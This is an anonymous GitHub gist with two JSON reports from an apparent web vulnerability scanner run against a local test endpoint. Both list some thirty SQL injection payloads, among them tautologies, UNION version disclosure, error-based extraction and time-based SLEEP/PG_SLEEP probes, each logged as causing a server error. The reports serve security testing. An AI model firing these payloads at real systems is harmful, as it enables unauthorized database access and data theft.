Created
June 17, 2016 18:41
-
-
Save anonymous/2a0e12ac23bc8b7d3936608ac600168d to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
report_by_test ("-s test") | |
{ | |
"errors": [], | |
"failures": { | |
"localhost:9000/test": { | |
"SQL_INJECTION_BODY": { | |
"POST - data:application/json|test": { | |
"500_errors": { | |
"confidence": "High", | |
"description": "This request returns an error with status code 501, which might indicate some server-side fault that could lead to further vulnerabilities", | |
"payloads": [ | |
"' or 'a'='a", | |
"' or 1=1 --", | |
"\" or \"a\"=\"a", | |
",(SELECT (CASE WHEN (1=1) THEN (SELECT 1 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END))", | |
"AND ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x)", | |
"AND SLEEP(10)", | |
",(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC))", | |
",ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x)", | |
"RLIKE (SELECT * FROM (SELECT(SLEEP(10)))x)", | |
"' union (select @@version) --", | |
",(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)", | |
",(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))", | |
"(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)", | |
"; OR '1'='1'", | |
"') or ('a'='a", | |
"(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC))", | |
"(SELECT 1 FROM PG_SLEEP(10))", | |
"AND EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x'))", | |
"AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)", | |
"(SELECT * FROM (SELECT(SLEEP(10)))x)", | |
"AND (SELECT * FROM (SELECT(SLEEP(10)))x)", | |
"(EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x')))", | |
"AND UPDATEXML(1,CONCAT('.','x',(SELECT (ELT(1=1,1))),'x'),2)", | |
"(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))", | |
"AND ELT(1=1,SLEEP(10))", | |
"AND 1=CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC)", | |
"PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT('','x',(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END)),'x')),1)", | |
"'/**/OR/**/1/**/=/**/1", | |
"a'b\"c'd\"", | |
"AND 1=(SELECT 1 FROM PG_SLEEP(10))" | |
], | |
"severity": "Low" | |
} | |
} | |
} | |
} | |
}, | |
"stats": { | |
"errors": 0, | |
"failures": 30, | |
"successes": 0 | |
} | |
} | |
report_by_issue ("-s issue") | |
{ | |
"errors": [], | |
"failures": { | |
"localhost:9000/test": { | |
"500_errors": { | |
"description": "This request returns an error with status code 501, which might indicate some server-side fault that could lead to further vulnerabilities", | |
"payloads": [ | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "AND EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x'))" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "AND UPDATEXML(1,CONCAT('.','x',(SELECT (ELT(1=1,1))),'x'),2)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "AND ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "AND 1=CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT('','x',(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END)),'x')),1)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "(EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x')))" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC))" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": ",(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": ",ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": ",(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC))" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "AND (SELECT * FROM (SELECT(SLEEP(10)))x)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "AND SLEEP(10)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "RLIKE (SELECT * FROM (SELECT(SLEEP(10)))x)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "AND ELT(1=1,SLEEP(10))" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "AND 1=(SELECT 1 FROM PG_SLEEP(10))" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "(SELECT * FROM (SELECT(SLEEP(10)))x)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "(SELECT 1 FROM PG_SLEEP(10))" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": ",(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": ",(SELECT (CASE WHEN (1=1) THEN (SELECT 1 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END))" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "a'b\"c'd\"" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "' or 'a'='a" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "\" or \"a\"=\"a" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "') or ('a'='a" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "'/**/OR/**/1/**/=/**/1" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "' or 1=1 --" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "' union (select @@version) --" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "; OR '1'='1'" | |
} | |
], | |
"severity": "Low" | |
} | |
} | |
}, | |
"stats": { | |
"High": 0, | |
"Low": 1, | |
"Medium": 0 | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment